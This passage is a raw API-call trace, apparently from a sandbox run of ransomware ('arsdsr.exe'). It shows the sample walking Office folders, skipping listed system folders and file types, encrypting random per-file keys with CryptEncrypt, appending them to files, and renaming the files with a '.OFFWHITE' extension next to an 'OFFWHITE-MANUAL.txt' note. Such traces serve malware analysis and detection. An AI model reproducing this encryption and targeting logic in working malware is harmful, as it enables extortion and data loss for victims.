pdwDataLen=0x295cf8c*=0x10, dwBufLen=0x100 | out: pbData=0x55fd88*, pdwDataLen=0x295cf8c*=0x100) returned 1 [0145.763] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x9f560, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.763] SetLastError (dwErrCode=0x0) [0145.763] WriteFile (in: hFile=0x218, lpBuffer=0x55fc80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x55fc80*, lpNumberOfBytesWritten=0x295d1cc*=0x100, lpOverlapped=0x0) returned 1 [0145.766] GetLastError () returned 0x0 [0145.766] GetLastError () returned 0x0 [0145.766] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x9f660, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.766] WriteFile (in: hFile=0x218, lpBuffer=0x55fd88*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x55fd88*, lpNumberOfBytesWritten=0x295d1cc*=0x100, lpOverlapped=0x0) returned 1 [0145.767] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x9f760, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.767] WriteFile (in: hFile=0x218, lpBuffer=0x546e28*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x546e28*, lpNumberOfBytesWritten=0x295d1cc*=0x8, lpOverlapped=0x0) returned 1 [0145.767] GetProcessHeap () returned 0x500000 [0145.767] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x9f560) returned 0x2a60020 [0145.768] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.768] ReadFile (in: hFile=0x218, lpBuffer=0x2a60020, nNumberOfBytesToRead=0x9f560, lpNumberOfBytesRead=0x295d1c0, lpOverlapped=0x0 | out: lpBuffer=0x2a60020*, lpNumberOfBytesRead=0x295d1c0*=0x9f560, lpOverlapped=0x0) returned 1 [0145.833] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.833] WriteFile (in: hFile=0x218, lpBuffer=0x2a60020*, nNumberOfBytesToWrite=0x9f560, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x2a60020*, lpNumberOfBytesWritten=0x295d1cc*=0x9f560, lpOverlapped=0x0) returned 1 [0145.835] GetProcessHeap () returned 0x500000 [0145.835] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x2a60020 | out: hHeap=0x500000) returned 1 [0145.839] CloseHandle (hObject=0x218) returned 1 [0145.840] GetProcessHeap () returned 0x500000 [0145.840] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55fc80 | out: hHeap=0x500000) returned 1 [0145.840] GetProcessHeap () returned 0x500000 [0145.840] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55fd88 | out: hHeap=0x500000) returned 1 [0145.840] GetProcessHeap () returned 0x500000 [0145.840] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5469f8 | out: hHeap=0x500000) returned 1 [0145.840] GetProcessHeap () returned 0x500000 [0145.840] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x546a10 | out: hHeap=0x500000) returned 1 [0145.840] lstrcpyW (in: lpString1=0x295cfb8, lpString2="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\OUTLLIBR.REST.trx_dll" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\OUTLLIBR.REST.trx_dll") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\OUTLLIBR.REST.trx_dll" [0145.840] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\OUTLLIBR.REST.trx_dll", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\OUTLLIBR.REST.trx_dll.OFFWHITE") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\OUTLLIBR.REST.trx_dll.OFFWHITE" [0145.840] MoveFileW (lpExistingFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\OUTLLIBR.REST.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\outllibr.rest.trx_dll"), lpNewFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\OUTLLIBR.REST.trx_dll.OFFWHITE" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\outllibr.rest.trx_dll.offwhite")) returned 1 [0145.841] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x315ed100, ftCreationTime.dwHighDateTime=0x1caca12, ftLastAccessTime.dwLowDateTime=0xeef739f0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x315ed100, ftLastWriteTime.dwHighDateTime=0x1caca12, nFileSizeHigh=0x0, nFileSizeLow=0x2d60, dwReserved0=0x660064, dwReserved1=0x295dcf0, cFileName="OUTLWVW.DLL.trx_dll", cAlternateFileName="OUTLWV~1.TRX")) returned 1 [0145.841] lstrcmpiW (lpString1="OUTLWVW.DLL.trx_dll", lpString2=".") returned 1 [0145.841] lstrcmpiW (lpString1="OUTLWVW.DLL.trx_dll", lpString2="..") returned 1 [0145.841] lstrcmpiW (lpString1="OUTLWVW.DLL.trx_dll", lpString2="...") returned 1 [0145.841] lstrcmpiW (lpString1="OUTLWVW.DLL.trx_dll", lpString2="windows") returned -1 [0145.841] lstrcmpiW (lpString1="OUTLWVW.DLL.trx_dll", lpString2="$recycle.bin") returned 1 [0145.842] lstrcmpiW (lpString1="OUTLWVW.DLL.trx_dll", lpString2="rsa") returned -1 [0145.842] lstrcmpiW (lpString1="OUTLWVW.DLL.trx_dll", lpString2="ntuser.dat") returned 1 [0145.842] lstrcmpiW (lpString1="OUTLWVW.DLL.trx_dll", lpString2="programdata") returned -1 [0145.842] lstrcmpiW (lpString1="OUTLWVW.DLL.trx_dll", lpString2="appdata") returned 1 [0145.842] lstrcmpiW (lpString1="OUTLWVW.DLL.trx_dll", lpString2="program files") returned -1 [0145.842] lstrcmpiW (lpString1="OUTLWVW.DLL.trx_dll", lpString2="program files (x86)") returned -1 [0145.842] lstrcpyW (in: lpString1=0x295d468, lpString2="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\" [0145.842] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", lpString2="OUTLWVW.DLL.trx_dll" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\OUTLWVW.DLL.trx_dll") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\OUTLWVW.DLL.trx_dll" [0145.842] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0145.842] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0145.842] PathFindExtensionW (pszPath="OUTLWVW.DLL.trx_dll") returned=".trx_dll" [0145.842] lstrcmpiW (lpString1=".trx_dll", lpString2=".exe") returned 1 [0145.842] lstrcmpiW (lpString1=".trx_dll", lpString2=".log") returned 1 [0145.842] lstrcmpiW (lpString1=".trx_dll", lpString2=".cab") returned 1 [0145.842] lstrcmpiW (lpString1=".trx_dll", lpString2=".cmd") returned 1 [0145.842] lstrcmpiW (lpString1=".trx_dll", lpString2=".com") returned 1 [0145.842] lstrcmpiW (lpString1=".trx_dll", lpString2=".cpl") returned 1 [0145.842] lstrcmpiW (lpString1=".trx_dll", lpString2=".ini") returned 1 [0145.843] lstrcmpiW (lpString1=".trx_dll", lpString2=".dll") returned 1 [0145.843] lstrcmpiW (lpString1=".trx_dll", lpString2=".url") returned -1 [0145.843] lstrcmpiW (lpString1=".trx_dll", lpString2=".ttf") returned -1 [0145.843] lstrcmpiW (lpString1=".trx_dll", lpString2=".mp3") returned 1 [0145.843] lstrcmpiW (lpString1=".trx_dll", lpString2=".pif") returned 1 [0145.843] lstrcmpiW (lpString1=".trx_dll", lpString2=".mp4") returned 1 [0145.843] lstrcmpiW (lpString1=".trx_dll", lpString2=".OFFWHITE") returned 1 [0145.843] lstrcmpiW (lpString1=".trx_dll", lpString2=".msi") returned 1 [0145.843] lstrcmpiW (lpString1="OUTLWVW.DLL.trx_dll", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0145.843] GetProcessHeap () returned 0x500000 [0145.843] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x546e38 [0145.843] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\OUTLWVW.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\outlwvw.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0145.844] GetFileSizeEx (in: hFile=0x218, lpFileSize=0x295d1e0 | out: lpFileSize=0x295d1e0*=11616) returned 1 [0145.844] GetProcessHeap () returned 0x500000 [0145.844] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x546a10 [0145.844] GetProcessHeap () returned 0x500000 [0145.844] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5469f8 [0145.844] GetProcessHeap () returned 0x500000 [0145.844] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55fd88 [0145.844] GetProcessHeap () returned 0x500000 [0145.844] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55fc80 [0145.844] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0145.844] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0145.844] SystemFunction036 (in: RandomBuffer=0x546a10, RandomBufferLength=0x10 | out: RandomBuffer=0x546a10) returned 1 [0145.844] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0145.844] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0145.844] SystemFunction036 (in: RandomBuffer=0x5469f8, RandomBufferLength=0x10 | out: RandomBuffer=0x5469f8) returned 1 [0145.844] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0145.844] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0145.845] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55fd88*, pdwDataLen=0x295cf90*=0x10, dwBufLen=0x100 | out: pbData=0x55fd88*, pdwDataLen=0x295cf90*=0x100) returned 1 [0145.845] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0145.845] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0145.845] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55fc80*, pdwDataLen=0x295cf8c*=0x10, dwBufLen=0x100 | out: pbData=0x55fc80*, pdwDataLen=0x295cf8c*=0x100) returned 1 [0145.845] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x2d60, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.845] SetLastError (dwErrCode=0x0) [0145.845] WriteFile (in: hFile=0x218, lpBuffer=0x55fd88*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x55fd88*, lpNumberOfBytesWritten=0x295d1cc*=0x100, lpOverlapped=0x0) returned 1 [0145.849] GetLastError () returned 0x0 [0145.849] GetLastError () returned 0x0 [0145.849] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x2e60, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.849] WriteFile (in: hFile=0x218, lpBuffer=0x55fc80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x55fc80*, lpNumberOfBytesWritten=0x295d1cc*=0x100, lpOverlapped=0x0) returned 1 [0145.849] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x2f60, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.849] WriteFile (in: hFile=0x218, lpBuffer=0x546e38*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x546e38*, lpNumberOfBytesWritten=0x295d1cc*=0x8, lpOverlapped=0x0) returned 1 [0145.849] GetProcessHeap () returned 0x500000 [0145.849] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x2d60) returned 0x5607c8 [0145.849] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.849] ReadFile (in: hFile=0x218, lpBuffer=0x5607c8, nNumberOfBytesToRead=0x2d60, lpNumberOfBytesRead=0x295d1c0, lpOverlapped=0x0 | out: lpBuffer=0x5607c8*, lpNumberOfBytesRead=0x295d1c0*=0x2d60, lpOverlapped=0x0) returned 1 [0145.851] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.851] WriteFile (in: hFile=0x218, lpBuffer=0x5607c8*, nNumberOfBytesToWrite=0x2d60, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x5607c8*, lpNumberOfBytesWritten=0x295d1cc*=0x2d60, lpOverlapped=0x0) returned 1 [0145.851] GetProcessHeap () returned 0x500000 [0145.851] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5607c8 | out: hHeap=0x500000) returned 1 [0145.851] CloseHandle (hObject=0x218) returned 1 [0145.851] GetProcessHeap () returned 0x500000 [0145.851] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55fd88 | out: hHeap=0x500000) returned 1 [0145.852] GetProcessHeap () returned 0x500000 [0145.852] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55fc80 | out: hHeap=0x500000) returned 1 [0145.852] GetProcessHeap () returned 0x500000 [0145.852] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x546a10 | out: hHeap=0x500000) returned 1 [0145.852] GetProcessHeap () returned 0x500000 [0145.852] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5469f8 | out: hHeap=0x500000) returned 1 [0145.852] lstrcpyW (in: lpString1=0x295cfb8, lpString2="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\OUTLWVW.DLL.trx_dll" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\OUTLWVW.DLL.trx_dll") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\OUTLWVW.DLL.trx_dll" [0145.852] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\OUTLWVW.DLL.trx_dll", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\OUTLWVW.DLL.trx_dll.OFFWHITE") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\OUTLWVW.DLL.trx_dll.OFFWHITE" [0145.852] MoveFileW (lpExistingFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\OUTLWVW.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\outlwvw.dll.trx_dll"), lpNewFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\OUTLWVW.DLL.trx_dll.OFFWHITE" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\outlwvw.dll.trx_dll.offwhite")) returned 1 [0145.853] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x1a4a9400, ftCreationTime.dwHighDateTime=0x1cac804, ftLastAccessTime.dwLowDateTime=0xef00bf70, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x1a4a9400, ftLastWriteTime.dwHighDateTime=0x1cac804, nFileSizeHigh=0x0, nFileSizeLow=0xd160, dwReserved0=0x660064, dwReserved1=0x295dcf0, cFileName="PPINTL.DLL.trx_dll", cAlternateFileName="PPINTL~1.TRX")) returned 1 [0145.853] lstrcmpiW (lpString1="PPINTL.DLL.trx_dll", lpString2=".") returned 1 [0145.853] lstrcmpiW (lpString1="PPINTL.DLL.trx_dll", lpString2="..") returned 1 [0145.853] lstrcmpiW (lpString1="PPINTL.DLL.trx_dll", lpString2="...") returned 1 [0145.853] lstrcmpiW (lpString1="PPINTL.DLL.trx_dll", lpString2="windows") returned -1 [0145.853] lstrcmpiW (lpString1="PPINTL.DLL.trx_dll", lpString2="$recycle.bin") returned 1 [0145.853] lstrcmpiW (lpString1="PPINTL.DLL.trx_dll", lpString2="rsa") returned -1 [0145.853] lstrcmpiW (lpString1="PPINTL.DLL.trx_dll", lpString2="ntuser.dat") returned 1 [0145.853] lstrcmpiW (lpString1="PPINTL.DLL.trx_dll", lpString2="programdata") returned -1 [0145.853] lstrcmpiW (lpString1="PPINTL.DLL.trx_dll", lpString2="appdata") returned 1 [0145.853] lstrcmpiW (lpString1="PPINTL.DLL.trx_dll", lpString2="program files") returned -1 [0145.853] lstrcmpiW (lpString1="PPINTL.DLL.trx_dll", lpString2="program files (x86)") returned -1 [0145.853] lstrcpyW (in: lpString1=0x295d468, lpString2="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\" [0145.853] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", lpString2="PPINTL.DLL.trx_dll" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\PPINTL.DLL.trx_dll") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\PPINTL.DLL.trx_dll" [0145.853] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0145.853] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0145.854] PathFindExtensionW (pszPath="PPINTL.DLL.trx_dll") returned=".trx_dll" [0145.854] lstrcmpiW (lpString1=".trx_dll", lpString2=".exe") returned 1 [0145.854] lstrcmpiW (lpString1=".trx_dll", lpString2=".log") returned 1 [0145.854] lstrcmpiW (lpString1=".trx_dll", lpString2=".cab") returned 1 [0145.854] lstrcmpiW (lpString1=".trx_dll", lpString2=".cmd") returned 1 [0145.854] lstrcmpiW (lpString1=".trx_dll", lpString2=".com") returned 1 [0145.854] lstrcmpiW (lpString1=".trx_dll", lpString2=".cpl") returned 1 [0145.854] lstrcmpiW (lpString1=".trx_dll", lpString2=".ini") returned 1 [0145.854] lstrcmpiW (lpString1=".trx_dll", lpString2=".dll") returned 1 [0145.854] lstrcmpiW (lpString1=".trx_dll", lpString2=".url") returned -1 [0145.854] lstrcmpiW (lpString1=".trx_dll", lpString2=".ttf") returned -1 [0145.854] lstrcmpiW (lpString1=".trx_dll", lpString2=".mp3") returned 1 [0145.854] lstrcmpiW (lpString1=".trx_dll", lpString2=".pif") returned 1 [0145.854] lstrcmpiW (lpString1=".trx_dll", lpString2=".mp4") returned 1 [0145.854] lstrcmpiW (lpString1=".trx_dll", lpString2=".OFFWHITE") returned 1 [0145.854] lstrcmpiW (lpString1=".trx_dll", lpString2=".msi") returned 1 [0145.854] lstrcmpiW (lpString1="PPINTL.DLL.trx_dll", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0145.854] GetProcessHeap () returned 0x500000 [0145.854] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x546e48 [0145.854] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\PPINTL.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\ppintl.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0145.855] GetFileSizeEx (in: hFile=0x218, lpFileSize=0x295d1e0 | out: lpFileSize=0x295d1e0*=53600) returned 1 [0145.855] GetProcessHeap () returned 0x500000 [0145.855] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5469f8 [0145.855] GetProcessHeap () returned 0x500000 [0145.855] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x546a10 [0145.855] GetProcessHeap () returned 0x500000 [0145.855] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55fc80 [0145.855] GetProcessHeap () returned 0x500000 [0145.855] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55fd88 [0145.855] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0145.855] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0145.855] SystemFunction036 (in: RandomBuffer=0x5469f8, RandomBufferLength=0x10 | out: RandomBuffer=0x5469f8) returned 1 [0145.855] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0145.855] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0145.855] SystemFunction036 (in: RandomBuffer=0x546a10, RandomBufferLength=0x10 | out: RandomBuffer=0x546a10) returned 1 [0145.856] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0145.856] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0145.856] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55fc80*, pdwDataLen=0x295cf90*=0x10, dwBufLen=0x100 | out: pbData=0x55fc80*, pdwDataLen=0x295cf90*=0x100) returned 1 [0145.856] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0145.856] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0145.856] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55fd88*, pdwDataLen=0x295cf8c*=0x10, dwBufLen=0x100 | out: pbData=0x55fd88*, pdwDataLen=0x295cf8c*=0x100) returned 1 [0145.856] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0xd160, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.856] SetLastError (dwErrCode=0x0) [0145.856] WriteFile (in: hFile=0x218, lpBuffer=0x55fc80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x55fc80*, lpNumberOfBytesWritten=0x295d1cc*=0x100, lpOverlapped=0x0) returned 1 [0145.858] GetLastError () returned 0x0 [0145.858] GetLastError () returned 0x0 [0145.858] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0xd260, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.859] WriteFile (in: hFile=0x218, lpBuffer=0x55fd88*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x55fd88*, lpNumberOfBytesWritten=0x295d1cc*=0x100, lpOverlapped=0x0) returned 1 [0145.859] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0xd360, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.859] WriteFile (in: hFile=0x218, lpBuffer=0x546e48*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x546e48*, lpNumberOfBytesWritten=0x295d1cc*=0x8, lpOverlapped=0x0) returned 1 [0145.859] GetProcessHeap () returned 0x500000 [0145.859] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0xd160) returned 0x5607c8 [0145.859] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.859] ReadFile (in: hFile=0x218, lpBuffer=0x5607c8, nNumberOfBytesToRead=0xd160, lpNumberOfBytesRead=0x295d1c0, lpOverlapped=0x0 | out: lpBuffer=0x5607c8*, lpNumberOfBytesRead=0x295d1c0*=0xd160, lpOverlapped=0x0) returned 1 [0145.864] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.864] WriteFile (in: hFile=0x218, lpBuffer=0x5607c8*, nNumberOfBytesToWrite=0xd160, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x5607c8*, lpNumberOfBytesWritten=0x295d1cc*=0xd160, lpOverlapped=0x0) returned 1 [0145.864] GetProcessHeap () returned 0x500000 [0145.864] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5607c8 | out: hHeap=0x500000) returned 1 [0145.865] CloseHandle (hObject=0x218) returned 1 [0145.865] GetProcessHeap () returned 0x500000 [0145.865] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55fc80 | out: hHeap=0x500000) returned 1 [0145.865] GetProcessHeap () returned 0x500000 [0145.865] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55fd88 | out: hHeap=0x500000) returned 1 [0145.865] GetProcessHeap () returned 0x500000 [0145.865] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5469f8 | out: hHeap=0x500000) returned 1 [0145.865] GetProcessHeap () returned 0x500000 [0145.865] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x546a10 | out: hHeap=0x500000) returned 1 [0145.865] lstrcpyW (in: lpString1=0x295cfb8, lpString2="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\PPINTL.DLL.trx_dll" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\PPINTL.DLL.trx_dll") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\PPINTL.DLL.trx_dll" [0145.865] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\PPINTL.DLL.trx_dll", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\PPINTL.DLL.trx_dll.OFFWHITE") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\PPINTL.DLL.trx_dll.OFFWHITE" [0145.865] MoveFileW (lpExistingFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\PPINTL.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\ppintl.dll.trx_dll"), lpNewFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\PPINTL.DLL.trx_dll.OFFWHITE" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\ppintl.dll.trx_dll.offwhite")) returned 1 [0145.866] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x19196700, ftCreationTime.dwHighDateTime=0x1cac804, ftLastAccessTime.dwLowDateTime=0xef00bf70, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x19196700, ftLastWriteTime.dwHighDateTime=0x1cac804, nFileSizeHigh=0x0, nFileSizeLow=0x43560, dwReserved0=0x660064, dwReserved1=0x295dcf0, cFileName="PPINTL.REST.trx_dll", cAlternateFileName="PPINTL~2.TRX")) returned 1 [0145.866] 